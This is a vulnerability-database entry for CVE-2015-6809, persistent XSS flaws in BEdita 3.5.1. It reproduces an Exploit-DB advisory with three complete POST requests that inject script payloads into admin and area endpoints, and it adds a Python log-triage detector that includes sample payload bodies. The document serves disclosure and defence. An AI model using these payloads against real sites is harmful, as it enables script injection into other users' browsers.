CVE-2015-6809

medium
Published 2015-09-04 · Modified 2026-05-06
CVSS v3
CVSS v4: not yet in upstream
VIR risk: 5.3

Description

Multiple cross-site scripting (XSS) vulnerabilities in BEdita before 3.6.0 allow remote attackers to inject arbitrary web script or HTML via the (1) cfg[projectName] parameter to index.php/admin/saveConfig, the (2) data[stats_provider_url] parameter to index.php/areas/saveArea, or the (3) data[description] parameter to index.php/areas/saveSection.

Predictions

Exploit likelihood: 20%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-38051 webapps php verified text · 3 KB
Sébastien Morin · 2015-09-01

Bedita 3.5.1 - Cross-Site Scripting

########################################################################################

# Title: Bedita 3.5.1 XSS vulnerabilities
# Application: Bedita
# Version: 3.5.1
# Software Link: http://www.bedita.com/
# Date: 2015-03-09
# Author: Sébastien Morin
# Contact: https://twitter.com/SebMorin1
# Category: Web Applications

########################################################################################

===================
Introduction:
===================

BEdita is an open source web development framework that features a Content Management System (CMS) out-of-the-box.
BEdita is built upon the PHP development framework CakePHP.

(http://en.wikipedia.org/wiki/BEdita)

########################################################################################

===================
Report Timeline:
===================

2015-03-09 Vulnerabilities reported to vendor
2015-03-10 Vendor response
2015-03-11 Vendor confirmed
2015-08-31 Vendor releases version 3.6
2015-08-31 Advisory Release


########################################################################################

===================
Technical details:
===================


Persistent XSS:
===============

Bedita 3.5.1 contains multiple flaws that allow a persistent remote cross-site scripting attack in the "cfg[projectName]", "data[stats_provider_url]" and "data[description]" parameters.
This could allow malicious users to create a specially crafted POST request that would execute arbitrary
code in a user's browser in order to gather data from them or to modify the content of the page presented to the user.


Exploit Examples:


1) cfg[projectName] parameter:

 	POST http://127.0.0.1/bedita/index.php/admin/saveConfig 
	Host: 127.0.0.1
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://127.0.0.1/bedita/index.php/admin/viewConfig
	Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
	Connection: keep-alive

	[...]cfg%5BprojectName%5D=<script>alert(12345)</script>[...]


2) data[stats_provider_url] parameter:

 	POST http://127.0.0.1/bedita/index.php/areas/saveArea
	Host: 127.0.0.1
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://127.0.0.1/bedita/index.php/areas/saveArea
	Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
	Connection: keep-alive

	[...]data%5Bstats_provider_url%5D="><script>alert(12345)</script>[...]


3) data[description] parameter:

	POST http://127.0.0.1/bedita/index.php/areas/saveSection
	Host: 127.0.0.1
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://127.0.0.1/bedita/index.php/areas/saveSection
	Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
	Connection: keep-alive

	[...]data%5Bdescription%5D=</textarea><script>alert(123)</script>[...]

########################################################################################
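
A log-triage check for the three endpoint and parameter pairs listed above, as an added example that is not part of the advisory or of BEdita. The sample requests are constructed, and the flagged character set and the names `flag_request` and `scan` are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Endpoint suffix -> parameter, as listed in the CVE description.
WATCHED = {
    "/index.php/admin/saveConfig": "cfg[projectName]",
    "/index.php/areas/saveArea": "data[stats_provider_url]",
    "/index.php/areas/saveSection": "data[description]",
}

# Heuristic (assumption): characters that let a value leave a text node,
# a double-quoted attribute, or a <textarea>. Expect false positives.
MARKUP = re.compile(r'[<>"]')


def flag_request(method, url, body):
    """Return (parameter, decoded value) pairs that carry markup characters."""
    if method.upper() != "POST":
        return []
    path = urlsplit(url).path
    param = next((p for s, p in WATCHED.items() if path.endswith(s)), None)
    if param is None:
        return []
    # parse_qsl percent-decodes names and values, so cfg%5BprojectName%5D
    # and cfg[projectName] are matched alike.
    return [(k, v) for k, v in parse_qsl(body, keep_blank_values=True)
            if k == param and MARKUP.search(v)]


def scan(requests):
    """Return (url, parameter, value) for every flagged request."""
    return [(url, k, v) for method, url, body in requests
            for k, v in flag_request(method, url, body)]


# Constructed sample requests (method, URL, form-encoded body).
BASE = "http://127.0.0.1/bedita/index.php"
SAMPLES = [
    ("POST", BASE + "/admin/saveConfig",
     "cfg%5BprojectName%5D=%3Cscript%3Ealert(12345)%3C%2Fscript%3E"),
    ("POST", BASE + "/areas/saveArea",
     "data%5Bstats_provider_url%5D=https%3A%2F%2Fstats.example.org%2F"),
    ("POST", BASE + "/areas/saveSection",
     "data%5Bdescription%5D=%3C%2Ftextarea%3E%3Cscript%3Ealert(123)%3C%2Fscript%3E"),
    ("GET", BASE + "/admin/viewConfig", ""),
]

if __name__ == "__main__":
    for hit in scan(SAMPLES):
        print(hit)
```
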

Application impact

Vendor | Product | Versions | Fixed
bedita | bedita | {"endIncluding":"3.5.1"} |

References

CWEs

CWE-79
